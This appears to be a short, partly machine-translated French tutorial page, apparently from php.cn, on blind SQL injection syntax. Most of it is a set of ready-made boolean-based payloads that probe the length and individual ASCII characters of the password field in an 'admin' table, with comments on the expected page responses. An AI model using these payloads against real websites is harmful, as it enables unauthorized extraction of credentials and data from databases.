Maison >base de données >tutoriel mysql >À propos de la syntaxe d'injection aveugle SQL

À propos de la syntaxe d'injection aveugle SQL

藏色散人
藏色散人avant
2020-04-03 13:16:512291parcourir

Si la page n'affiche pas de chiffres erronés, utilisez la syntaxe d'injection aveugle pour déterminer le contenu des données en fonction des modifications de la page

Obtenez la longueur des données :

and (select top 1 len(列名) from 表名)>5
and (select top 1 len(password) from admin)>16//错误
and (select top 1 len(password) from admin)>15//正常

Obtenez le nombre spécifié de chiffres de data :

and (select top 1 asc(mid(列名,位置,1)) from 表名)>97
and (select top 1 asc(mid(admin,1,1)) from admin)>96//判断admin字段的内容第一位的ascii码值大于96 正常
and (select top 1 asc(mid(admin,1,1)) from admin)>97//判断admin字段的内容第一位的ascii码值大于97 错误 说明就是97

mid(字符串,截取的位置,截取字符数)
asc() //将字符转换成ascii码 方便进行比较

Recommandé : "tutoriel vidéo MySQL"

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!

Déclaration:
Cet article est reproduit dans:. en cas de violation, veuillez contacter admin@php.cn Supprimer